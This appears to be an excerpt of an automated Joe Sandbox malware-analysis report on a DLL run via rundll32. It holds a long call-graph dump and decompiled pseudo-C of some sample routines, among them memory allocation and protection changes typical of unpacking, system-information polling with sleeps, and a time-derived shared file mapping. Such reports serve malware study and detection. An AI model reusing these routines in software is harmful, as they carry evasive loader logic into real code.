700096a4 16681->16682 16683 700019e4 16681->16683 16684 70009d88 _Atexit 6 API calls 16682->16684 16683->16678 16685 700096ab 16684->16685 16685->16683 16686 70009dc7 _Atexit 6 API calls 16685->16686 16687 700096be 16686->16687 16689 70009561 16687->16689 16690 7000956c 16689->16690 16694 7000957c 16689->16694 16695 70009582 16690->16695 16693 700074e6 _free 14 API calls 16693->16694 16694->16683 16696 7000959d 16695->16696 16697 70009597 16695->16697 16699 700074e6 _free 14 API calls 16696->16699 16698 700074e6 _free 14 API calls 16697->16698 16698->16696 16700 700095a9 16699->16700 16701 700074e6 _free 14 API calls 16700->16701 16702 700095b4 16701->16702 16703 700074e6 _free 14 API calls 16702->16703 16704 700095bf 16703->16704 16705 700074e6 _free 14 API calls 16704->16705 16706 700095ca 16705->16706 16707 700074e6 _free 14 API calls 16706->16707 16708 700095d5 16707->16708 16709 700074e6 _free 14 API calls 16708->16709 16710 700095e0 16709->16710 16711 700074e6 _free 14 API calls 16710->16711 16712 700095eb 16711->16712 16713 700074e6 _free 14 API calls 16712->16713 16714 700095f6 16713->16714 16715 700074e6 _free 14 API calls 16714->16715 16716 70009604 16715->16716 16721 700093ae 16716->16721 16722 700093ba ___FrameUnwindToState 16721->16722 16737 70006cec RtlEnterCriticalSection 16722->16737 16724 700093ee 16738 7000940d 16724->16738 16726 700093c4 16726->16724 16728 700074e6 _free 14 API calls 16726->16728 16728->16724 16729 70009419 16730 70009425 ___FrameUnwindToState 16729->16730 16742 70006cec RtlEnterCriticalSection 16730->16742 16732 7000942f 16733 7000964f _Atexit 14 API calls 16732->16733 16734 70009442 16733->16734 16743 70009462 16734->16743 16737->16726 16741 70006d34 RtlLeaveCriticalSection 16738->16741 16740 700093fb 16740->16729 16741->16740 16742->16732 16746 70006d34 RtlLeaveCriticalSection 16743->16746 16745 70009450 16745->16693 16746->16745 16748 70005fb1 16747->16748 16754 700019e9 16747->16754 16751 70005fbf 16748->16751 16755 7000649e 16748->16755 16760 700064d8 16751->16760 16752 70005fcf 16765 70005f88 16752->16765 16754->16661 16769 70006309 16755->16769 16757 700064b8 16758 700064c4 16757->16758 16759 700064cf TlsGetValue 16757->16759 16758->16751 16759->16758 16761 70006309 try_get_function 5 API calls 16760->16761 16762 700064f2 16761->16762 16763 7000650c TlsSetValue 16762->16763 16764 70006501 16762->16764 16763->16764 16764->16752 16766 70005f92 16765->16766 16768 70005f9f 16765->16768 16767 700074e6 _free 14 API calls 16766->16767 16766->16768 16767->16768 16768->16754 16772 70006339 16769->16772 16773 7000633d __crt_fast_encode_pointer 16769->16773 16770 7000635d 16770->16773 16774 70006369 GetProcAddress 16770->16774 16772->16770 16772->16773 16775 700063a9 16772->16775 16773->16757 16774->16773 16776 700063d1 LoadLibraryExW 16775->16776 16779 700063c6 16775->16779 16777 70006405 16776->16777 16778 700063ed GetLastError 16776->16778 16777->16779 16780 7000641c FreeLibrary 16777->16780 16778->16777 16781 700063f8 LoadLibraryExW 16778->16781 16779->16772 16780->16779 16781->16777 16788 70005fea 16782->16788 16784 700019c5 16784->16670 16785 70008c15 16784->16785 16786 7000981d _Atexit 14 API calls 16785->16786 16787 700019d1 16786->16787 16787->16673 16787->16674 16789 70005ff3 16788->16789 16790 70005ff6 GetLastError 16788->16790 16789->16784 16791 7000649e ___vcrt_FlsGetValue 6 API calls 16790->16791 16792 7000600b 16791->16792 16793 70006070 SetLastError 16792->16793 16794 700064d8 ___vcrt_FlsSetValue 6 API calls 16792->16794 16803 7000602a 16792->16803 16793->16784 16795 70006024 16794->16795 16796 70007341 __Getctype 14 API calls 16795->16796 16795->16803 16797 70006038 16796->16797 16798 7000604c 16797->16798 16799 700064d8 ___vcrt_FlsSetValue 6 API calls 16797->16799 16800 700064d8 ___vcrt_FlsSetValue 6 API calls 16798->16800 16801 70006060 16798->16801 16799->16798 16800->16801 16802 700074e6 _free 14 API calls 16801->16802 16802->16803 16803->16793 17044 700018ce 17045 700018d7 17044->17045 17046 700018dc dllmain_dispatch 17044->17046 17048 70002039 17045->17048 17049 70002069 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 17048->17049 17050 7000205c 17048->17050 17051 70002060 17049->17051 17050->17049 17050->17051 17051->17046 17032 6ffa1da0 17033 6ffa1db6 17032->17033 17034 6ffa1e25 InterlockedDecrement 17032->17034 17036 6ffa1dbd InterlockedIncrement 17033->17036 17043 6ffa1e10 17033->17043 17035 6ffa1e34 17034->17035 17034->17043 17038 6ffa1e66 HeapDestroy 17035->17038 17039 6ffa1e41 SleepEx 17035->17039 17041 6ffa1e5a CloseHandle 17035->17041 17037 6ffa1dd0 HeapCreate 17036->17037 17036->17043 17040 6ffa1de6 17037->17040 17037->17043 17038->17043 17039->17035 17039->17041 17042 6ffa1d2d 6 API calls 17040->17042 17041->17038 17042->17043 16232 6ffa149b GetCurrentThread SetThreadAffinityMask 16233 6ffa14b9 SetThreadPriority 16232->16233 16234 6ffa14be 16232->16234 16233->16234 16239 6ffa14fe 16234->16239 16237 6ffa14cd SetThreadPriority 16238 6ffa14d1 16237->16238 16266 6ffa1f7c CreateEventA 16239->16266 16241 6ffa1512 16242 6ffa14c7 16241->16242 16243 6ffa1520 NtQuerySystemInformation 16241->16243 16242->16237 16242->16238 16272 6ffa1b8c 16243->16272 16246 6ffa1569 16246->16242 16280 6ffa195c 16246->16280 16249 6ffa161f 16249->16242 16251 6ffa1628 GetLastError 16249->16251 16250 6ffa15c8 16302 6ffa1d2d CreateThread 16250->16302 16251->16242 16256 6ffa15ef WaitForSingleObject 16259 6ffa160c CloseHandle 16256->16259 16260 6ffa1600 GetExitCodeThread 16256->16260 16257 6ffa1615 GetLastError 16257->16249 16258 6ffa1595 GetLongPathNameW 16258->16250 16261 6ffa15aa 16258->16261 16259->16249 16260->16259 16300 6ffa1d8b HeapAlloc 16261->16300 16263 6ffa15b4 16263->16250 16264 6ffa15bd GetLongPathNameW 16263->16264 16301 6ffa1e7c HeapFree 16264->16301 16267 6ffa1f9a GetVersion 16266->16267 16268 6ffa1fe1 GetLastError 16266->16268 16269 6ffa1fdc 16267->16269 16270 6ffa1fa4 GetCurrentProcessId OpenProcess 16267->16270 16269->16241 16271 6ffa1fd1 16270->16271 16271->16241 16273 6ffa1ba8 16272->16273 16274 6ffa1552 Sleep 16273->16274 16275 6ffa1bb3 VirtualAlloc 16273->16275 16274->16243 16274->16246 16275->16274 16276 6ffa1bf3 16275->16276 16277 6ffa1c87 16276->16277 16278 6ffa1c74 memcpy 16276->16278 16279 6ffa1c8e VirtualFree 16277->16279 16278->16279 16279->16274 16306 6ffa1823 16280->16306 16282 6ffa1576 16282->16249 16282->16250 16288 6ffa1637 16282->16288 16283 6ffa197d 16283->16282 16284 6ffa19c2 HeapFree 16283->16284 16313 6ffa11bf GetLocaleInfoA 16283->16313 16284->16282 16287 6ffa19bd 16287->16284 16318 6ffa1d8b HeapAlloc 16288->16318 16290 6ffa1655 16291 6ffa165b GetModuleFileNameW 16290->16291 16292 6ffa1591 16290->16292 16293 6ffa168c 16291->16293 16297 6ffa166d 16291->16297 16292->16250 16292->16258 16293->16292 16294 6ffa169e GetLastError 16293->16294 16295 6ffa1697 16293->16295 16321 6ffa1e7c HeapFree 16294->16321 16295->16292 16297->16291 16297->16293 16319 6ffa1e7c HeapFree 16297->16319 16320 6ffa1d8b HeapAlloc 16297->16320 16300->16263 16301->16250 16303 6ffa1d50 QueueUserAPC 16302->16303 16304 6ffa15e9 16302->16304 16303->16304 16305 6ffa1d63 GetLastError TerminateThread CloseHandle SetLastError 16303->16305 16304->16256 16304->16257 16305->16304 16311 6ffa1860 16306->16311 16308 6ffa18e0 16309 6ffa18de 16308->16309 16310 6ffa1915 memcpy 16308->16310 16309->16283 16310->16309 16311->16308 16311->16309 16316 6ffa1d8b HeapAlloc 16311->16316 16317 6ffa1e7c HeapFree 16311->16317 16314 6ffa11de GetSystemDefaultUILanguage VerLanguageNameA 16313->16314 16315 6ffa11f6 StrStrIA 16313->16315 16314->16315 16315->16284 16315->16287 16316->16311 16317->16311 16318->16290 16319->16297 16320->16297 16321->16295 16395 7000d373 GetStartupInfoW 16396 7000d390 16395->16396 16397 7000d424 16395->16397 16396->16397 16401 70012c5d 16396->16401 16399 7000d3b8 16399->16397 16400 7000d3e8 GetFileType 16399->16400 16400->16399 16402 70012c69 ___FrameUnwindToState 16401->16402 16403 70012c93 16402->16403 16404 70012c72 16402->16404 16412 70006cec RtlEnterCriticalSection 16403->16412 16420 70006ddb 16404->16420 16407 70012ccb 16423 70012cf2 16407->16423 16408 70012c9f 16408->16407 16413 70012bad 16408->16413 16411 70012c77 __cftoe 16411->16399 16412->16408 16426 70007341 16413->16426 16415 70012bcc 16438 700074e6 16415->16438 16416 70012bbf 16416->16415 16433 70009e84 16416->16433 16419 70012c21 16419->16408 16471 7000981d GetLastError 16420->16471 16422 70006de0 16422->16411 16651 70006d34 RtlLeaveCriticalSection 16423->16651 16425 70012cf9 16425->16411 16427 7000734e __Wcsxfrm 16426->16427 16428 7000738e 16427->16428 16429 70007379 RtlAllocateHeap 16427->16429 16444 70007d94 16427->16444 16431 70006ddb __Wcscoll 13 API calls 16428->16431 16429->16427 16430 7000738c 16429->16430 16430->16416 16431->16430 16458 70009bd4 16433->16458 16435 70009ea0 16436 70009ebe InitializeCriticalSectionAndSpinCount 16435->16436 16437 70009ea9 16435->16437 16436->16437 16437->16416 16439 700074f1 HeapFree 16438->16439 16443 7000751a __dosmaperr 16438->16443 16440 70007506 16439->16440 16439->16443 16441 70006ddb __Wcscoll 12 API calls 16440->16441 16442 7000750c GetLastError 16441->16442 16442->16443 16443->16419 16447 70007dc1 16444->16447 16448 70007dcd ___FrameUnwindToState 16447->16448 16453 70006cec RtlEnterCriticalSection 16448->16453 16450 70007dd8 16454 70007e14 16450->16454 16453->16450 16457 70006d34 RtlLeaveCriticalSection 16454->16457 16456 70007d9f 16456->16427 16457->16456 16459 70009c02 16458->16459 16463 70009bfe __crt_fast_encode_pointer 16458->16463 16459->16463 16464 70009b0d 16459->16464 16462 70009c1c GetProcAddress 16462->16463 16463->16435 16465 70009b1e _Atexit 16464->16465 16466 70009b3c LoadLibraryExW 16465->16466 16468 70009bb2 FreeLibrary 16465->16468 16469 70009bc9 16465->16469 16470 70009b8a LoadLibraryExW 16465->16470 16466->16465 16467 70009b57 GetLastError 16466->16467 16467->16465 16468->16465 16469->16462 16469->16463 16470->16465 16472 70009834 16471->16472 16475 7000983a 16471->16475 16494 70009d88 16472->16494 16491 70009840 SetLastError 16475->16491 16499 70009dc7 16475->16499 16477 70007341 __Getctype 12 API calls 16479 70009868 16477->16479 16480 70009870 16479->16480 16481 70009887 16479->16481 16483 70009dc7 _Atexit 6 API calls 16480->16483 16482 70009dc7 _Atexit 6 API calls 16481->16482 16485 70009893 16482->16485 16484 7000987e 16483->16484 16488 700074e6 _free 12 API calls 16484->16488 16486 70009897 16485->16486 16487 700098a8 16485->16487 16489 70009dc7 _Atexit 6 API calls 16486->16489 16504 700094c8 16487->16504 16488->16491 16489->16484 16491->16422 16493 700074e6 _free 12 API calls 16493->16491 16495 70009bd4 _Atexit 5 API calls 16494->16495 16496 70009da4 16495->16496 16497 70009dad 16496->16497 16498 70009dbf TlsGetValue 16496->16498 16497->16475 16500 70009bd4 _Atexit 5 API calls 16499->16500 16501 70009de3 16500->16501 16502 70009e01 TlsSetValue 16501->16502 16503 70009858 16501->16503 16503->16477 16503->16491 16509 7000935c 16504->16509 16510 70009368 ___FrameUnwindToState 16509->16510 16523 70006cec RtlEnterCriticalSection 16510->16523 16512 70009372 16524 700093a2 16512->16524 16515 7000946e 16516 7000947a ___FrameUnwindToState 16515->16516 16528 70006cec RtlEnterCriticalSection 16516->16528 16518 70009484 16529 7000964f 16518->16529 16520 7000949c 16533 700094bc 16520->16533 16523->16512 16527 70006d34 RtlLeaveCriticalSection 16524->16527 16526 70009390 16526->16515 16527->16526 16528->16518 16530 70009685 __Getctype 16529->16530 16531 7000965e __Getctype 16529->16531 16530->16520 16531->16530 16536 70010168 16531->16536 16650 70006d34 RtlLeaveCriticalSection 16533->16650 16535 700094aa 16535->16493 16538 700101e8 16536->16538 16539 7001017e 16536->16539 16541 700074e6 _free 14 API calls 16538->16541 16562 70010236 16538->16562 16539->16538 16544 700101b1 16539->16544 16547 700074e6 _free 14 API calls 16539->16547 16540 70010244 16551 700102a4 16540->16551 16563 700074e6 14 API calls _free 16540->16563 16542 7001020a 16541->16542 16543 700074e6 _free 14 API calls 16542->16543 16545 7001021d 16543->16545 16548 700074e6 _free 14 API calls 16544->16548 16561 700101d3 16544->16561 16549 700074e6 _free 14 API calls 16545->16549 16546 700074e6 _free 14 API calls 16550 700101dd 16546->16550 16552 700101a6 16547->16552 16553 700101c8 16548->16553 16554 7001022b 16549->16554 16555 700074e6 _free 14 API calls 16550->16555 16556 700074e6 _free 14 API calls 16551->16556 16564 700106a3 16552->16564 16592 70010b58 16553->16592 16559 700074e6 _free 14 API calls 16554->16559 16555->16538 16560 700102aa 16556->16560 16559->16562 16560->16530 16561->16546 16604 700102d9 16562->16604 16563->16540 16565 700106b4 16564->16565 16591 7001079d 16564->16591 16566 700106c5 16565->16566 16567 700074e6 _free 14 API calls 16565->16567 16568 700106d7 16566->16568 16569 700074e6 _free 14 API calls 16566->16569 16567->16566 16570 700106e9 16568->16570 16571 700074e6 _free 14 API calls 16568->16571 16569->16568 16572 700106fb 16570->16572 16573 700074e6 _free 14 API calls 16570->16573 16571->16570 16574 7001070d 16572->16574 16575 700074e6 _free 14 API calls 16572->16575 16573->16572 16576 7001071f 16574->16576 16577 700074e6 _free 14 API calls 16574->16577 16575->16574 16578 70010731 16576->16578 16579 700074e6 _free 14 API calls 16576->16579 16577->16576 16580 700074e6 _free 14 API calls 16578->16580 16582 70010743 16578->16582 16579->16578 16580->16582 16581 70010755 16584 70010767 16581->16584 16585 700074e6 _free 14 API calls 16581->16585 16582->16581 16583 700074e6 _free 14 API calls 16582->16583 16583->16581 16586 70010779 16584->16586 16587 700074e6 _free 14 API calls 16584->16587 16585->16584 16588 7001078b 16586->16588 16589 700074e6 _free 14 API calls 16586->16589 16587->16586 16590 700074e6 _free 14 API calls 16588->16590 16588->16591 16589->16588 16590->16591 16591->16544 16593 70010bbd 16592->16593 16595 70010b65 16592->16595 16593->16561 16594 70010b75 16597 70010b87 16594->16597 16598 700074e6 _free 14 API calls 16594->16598 16595->16594 16596 700074e6 _free 14 API calls 16595->16596 16596->16594 16599 70010b99 16597->16599 16601 700074e6 _free 14 API calls 16597->16601 16598->16597 16600 70010bab 16599->16600 16602 700074e6 _free 14 API calls 16599->16602 16600->16593 16603 700074e6 _free 14 API calls 16600->16603 16601->16599 16602->16600 16603->16593 16605 700102e6 16604->16605 16609 70010305 16604->16609 16605->16609 16610 70011084 16605->16610 16608 700074e6 _free 14 API calls 16608->16609 16609->16540 16611 700102ff 16610->16611 16612 70011095 16610->16612 16611->16608 16646 70010dd0 16612->16646 16615 70010dd0 __Getctype 14 API calls 16616 700110a8 16615->16616 16617 70010dd0 __Getctype 14 API calls 16616->16617 16618 700110b3 16617->16618 16619 70010dd0 __Getctype 14 API calls 16618->16619 16620 700110be 16619->16620 16621 70010dd0 __Getctype 14 API calls 16620->16621 16622 700110cc 16621->16622 16623 700074e6 _free 14 API calls 16622->16623 16624 700110d7 16623->16624 16625 700074e6 _free 14 API calls 16624->16625 16626 700110e2 16625->16626 16627 700074e6 _free 14 API calls 16626->16627 16628 700110ed 16627->16628 16629 70010dd0 __Getctype 14 API calls 16628->16629 16630 700110fb 16629->16630 16631 70010dd0 __Getctype 14 API calls 16630->16631 16632 70011109 16631->16632 16633 70010dd0 __Getctype 14 API calls 16632->16633 16634 7001111a 16633->16634 16635 70010dd0 __Getctype 14 API calls 16634->16635 16636 70011128 16635->16636 16637 70010dd0 __Getctype 14 API calls 16636->16637 16638 70011136 16637->16638 16639 700074e6 _free 14 API calls 16638->16639 16640 70011141 16639->16640 16641 700074e6 _free 14 API calls 16640->16641 16642 7001114c 16641->16642 16643 700074e6 _free 14 API calls 16642->16643 16644 70011157 16643->16644 16645 700074e6 _free 14 API calls 16644->16645 16645->16611 16647 70010e03 16646->16647 16648 70010df3 16646->16648 16647->16615 16648->16647 16649 700074e6 _free 14 API calls 16648->16649 16649->16648 16650->16535 16651->16425

                    Executed Functions

                    Function 7004A96D Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,000006C4,00003000,00000040,000006C4,7004A3C0), ref: 7004AA2A
                    • VirtualAlloc.KERNEL32(00000000,0000003E,00003000,00000040,7004A41F), ref: 7004AA61
                    • VirtualAlloc.KERNEL32(00000000,00011426,00003000,00000040), ref: 7004AAC1
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 7004AAF7
                    • VirtualProtect.KERNEL32(6FFA0000,00000000,00000004,7004A94C), ref: 7004ABFC
                    • VirtualProtect.KERNEL32(6FFA0000,00001000,00000004,7004A94C), ref: 7004AC23
                    • VirtualProtect.KERNEL32(00000000,?,00000002,7004A94C), ref: 7004ACF0
                    • VirtualProtect.KERNEL32(00000000,?,00000002,7004A94C,?), ref: 7004AD46
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 7004AD62
                    Memory Dump Source
                    • Source File: 00000017.00000002.882581732.000000007004A000.00000040.00000001.01000000.0000000C.sdmp, Offset: 7004A000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7004a000_rundll32.jbxd
                    Similarity
                    • API ID: Virtual$Protect$Alloc$Free
                    • String ID:
                    • API String ID: 2574235972-0
                    • Opcode ID: 2a6d906b896be9674878654af31795075e0e483536a4b99ab448420acfd02bd9
                    • Instruction ID: 66020e3fabe3816e431a5534d1c565300b21a6bd2d7ffa864c9e8c5b6a7741f7
                    • Opcode Fuzzy Hash: 2a6d906b896be9674878654af31795075e0e483536a4b99ab448420acfd02bd9
                    • Instruction Fuzzy Hash: B3D182765401009FEB95DF14CA90F5537A6FF8B710B0E10A8ED0A5FA5AD7B1A830DBAC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA14FE Relevance: 13.6, APIs: 9, Instructions: 107sleepnativesynchronizationCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 82%
                    			E6FFA14FE(intOrPtr _a4) {
				void _v316;
				signed int _v332;
				long _v344;
				long _v348;
				char _v356;
				char _v360;
				long _v364;
				long _v368;
				void* __edi;
				long _t25;
				long _t28;
				long _t31;
				long _t32;
				long _t36;
				void* _t42;
				intOrPtr _t44;
				intOrPtr _t49;
				long _t50;
				void* _t56;
				signed int _t59;
				signed int _t60;
				void* _t62;
				intOrPtr* _t63;

				_t25 = E6FFA1F7C();
				_v348 = _t25;
				if(_t25 != 0) {
					L18:
					return _t25;
				} else {
					goto L1;
				}
				do {
					L1:
					_v344 = 0;
					_t28 = NtQuerySystemInformation(8,  &_v316, 0x138,  &_v344); // executed
					_t50 = _t28;
					_t59 = 0x13;
					_t11 = _t50 + 1; // 0x1
					_t60 = _v332 % _t59 + _t11;
					_t31 = E6FFA1B8C(0, _t60); // executed
					_v368 = _t31;
					Sleep(_t60 << 4); // executed
					_t25 = _v368;
				} while (_t25 == 9);
				if(_t25 != 0) {
					goto L18;
				}
				_t32 = E6FFA195C(_t50); // executed
				_v364 = _t32;
				if(_t32 != 0) {
					L16:
					_t25 = _v364;
					if(_t25 == 0xffffffff) {
						_t25 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t62 = E6FFA1D2D(E6FFA1768,  &_v356);
					if(_t62 == 0) {
						_v368 = GetLastError();
					} else {
						_t36 = WaitForSingleObject(_t62, 0xffffffff);
						_v368 = _t36;
						if(_t36 == 0) {
							GetExitCodeThread(_t62,  &_v368);
						}
						CloseHandle(_t62);
					}
					goto L16;
				}
				if(E6FFA1637(_t50,  &_v360) != 0) {
					 *0x6ffa41b8 = 0;
					goto L11;
				}
				_t49 = _v360;
				_t63 = __imp__GetLongPathNameW;
				_t42 =  *_t63(_t49, 0, 0); // executed
				_t56 = _t42;
				if(_t56 == 0) {
					L9:
					 *0x6ffa41b8 = _t49;
					goto L11;
				}
				_t19 = _t56 + 2; // 0x2
				_t44 = E6FFA1D8B(_t56 + _t19);
				 *0x6ffa41b8 = _t44;
				if(_t44 == 0) {
					goto L9;
				} else {
					 *_t63(_t49, _t44, _t56); // executed
					E6FFA1E7C(_t49);
					goto L11;
				}
			}


























                    0x6ffa150d
                    0x6ffa1516
                    0x6ffa151a
                    0x6ffa162e
                    0x6ffa1634
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa1520
                    0x6ffa1520
                    0x6ffa1531
                    0x6ffa1535
                    0x6ffa153b
                    0x6ffa1543
                    0x6ffa1548
                    0x6ffa1548
                    0x6ffa154d
                    0x6ffa1556
                    0x6ffa155a
                    0x6ffa1560
                    0x6ffa1564
                    0x6ffa156b
                    0x00000000
                    0x00000000
                    0x6ffa1571
                    0x6ffa1578
                    0x6ffa157c
                    0x6ffa161f
                    0x6ffa161f
                    0x6ffa1626
                    0x6ffa1628
                    0x6ffa1628
                    0x00000000
                    0x6ffa1626
                    0x6ffa1585
                    0x6ffa15d8
                    0x6ffa15d8
                    0x6ffa15e9
                    0x6ffa15ed
                    0x6ffa161b
                    0x6ffa15ef
                    0x6ffa15f2
                    0x6ffa15fa
                    0x6ffa15fe
                    0x6ffa1606
                    0x6ffa1606
                    0x6ffa160d
                    0x6ffa160d
                    0x00000000
                    0x6ffa15ed
                    0x6ffa1593
                    0x6ffa15d2
                    0x00000000
                    0x6ffa15d2
                    0x6ffa1595
                    0x6ffa1599
                    0x6ffa15a2
                    0x6ffa15a4
                    0x6ffa15a8
                    0x6ffa15ca
                    0x6ffa15ca
                    0x00000000
                    0x6ffa15ca
                    0x6ffa15aa
                    0x6ffa15af
                    0x6ffa15b6
                    0x6ffa15bb
                    0x00000000
                    0x6ffa15bd
                    0x6ffa15c0
                    0x6ffa15c3
                    0x00000000
                    0x6ffa15c3

                    APIs
                      • Part of subcall function 6FFA1F7C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6FFA1512,747863F0,00000000), ref: 6FFA1F8B
                      • Part of subcall function 6FFA1F7C: GetVersion.KERNEL32 ref: 6FFA1F9A
                      • Part of subcall function 6FFA1F7C: GetCurrentProcessId.KERNEL32 ref: 6FFA1FA9
                      • Part of subcall function 6FFA1F7C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6FFA1FC2
                    • NtQuerySystemInformation.NTDLL ref: 6FFA1535
                      • Part of subcall function 6FFA1B8C: VirtualAlloc.KERNELBASE(00000000,6FFA1552,00003000,00000004,?,?,6FFA1552,00000001), ref: 6FFA1BE2
                      • Part of subcall function 6FFA1B8C: memcpy.NTDLL(?,?,6FFA1552,?,?,6FFA1552,00000001), ref: 6FFA1C7D
                      • Part of subcall function 6FFA1B8C: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6FFA1552,00000001), ref: 6FFA1C98
                    • Sleep.KERNELBASE(00000001,00000001), ref: 6FFA155A
                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6FFA15A2
                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6FFA15C0
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,6FFA1768,?,00000000), ref: 6FFA15F2
                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6FFA1606
                    • CloseHandle.KERNEL32(00000000), ref: 6FFA160D
                    • GetLastError.KERNEL32(6FFA1768,?,00000000), ref: 6FFA1615
                    • GetLastError.KERNEL32 ref: 6FFA1628
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastLongNamePathProcessVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleInformationObjectOpenQuerySingleSleepSystemThreadVersionWaitmemcpy
                    • String ID:
                    • API String ID: 2016936029-0
                    • Opcode ID: e738555fa212b1b217565ff8eb03c43d3f85c483dfe490115f09cf577c5190f5
                    • Instruction ID: 7ef5bfe1d142bbae6db805f09c1ed7540757b3285b9aec7abdbc95e071c51865
                    • Opcode Fuzzy Hash: e738555fa212b1b217565ff8eb03c43d3f85c483dfe490115f09cf577c5190f5
                    • Instruction Fuzzy Hash: 8C31B272904715EBD701DF248844A5FBBECFF86764F06092AF521C7290EB32D5188FA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA10ED Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 69%
                    			E6FFA10ED(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6FFA2220();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6ffa41d0;
				_push(_t15 + 0x6ffa505e);
				_push(_t15 + 0x6ffa5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6FFA221A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6ffa41c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                    0x6ffa10ed
                    0x6ffa10f6
                    0x6ffa10fa
                    0x6ffa1100
                    0x6ffa1105
                    0x6ffa110a
                    0x6ffa110d
                    0x6ffa1110
                    0x6ffa1115
                    0x6ffa1116
                    0x6ffa1119
                    0x6ffa1124
                    0x6ffa112b
                    0x6ffa112f
                    0x6ffa1131
                    0x6ffa1132
                    0x6ffa1135
                    0x6ffa113a
                    0x6ffa1144
                    0x6ffa1146
                    0x6ffa1146
                    0x6ffa115a
                    0x6ffa1160
                    0x6ffa1164
                    0x6ffa11b4
                    0x6ffa1166
                    0x6ffa116f
                    0x6ffa1185
                    0x6ffa118d
                    0x6ffa119f
                    0x6ffa11a3
                    0x00000000
                    0x00000000
                    0x6ffa118f
                    0x6ffa1192
                    0x6ffa1197
                    0x6ffa1199
                    0x6ffa1199
                    0x6ffa117a
                    0x6ffa117c
                    0x6ffa11a5
                    0x6ffa11a6
                    0x6ffa11a6
                    0x6ffa116f
                    0x6ffa11bc

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A,?,?), ref: 6FFA10FA
                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6FFA1110
                    • _snwprintf.NTDLL ref: 6FFA1135
                    • CreateFileMappingW.KERNELBASE(000000FF,6FFA41C0,00000004,00000000,?,?), ref: 6FFA115A
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A,?), ref: 6FFA1171
                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6FFA1185
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A,?), ref: 6FFA119D
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A), ref: 6FFA11A6
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A,?), ref: 6FFA11AE
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
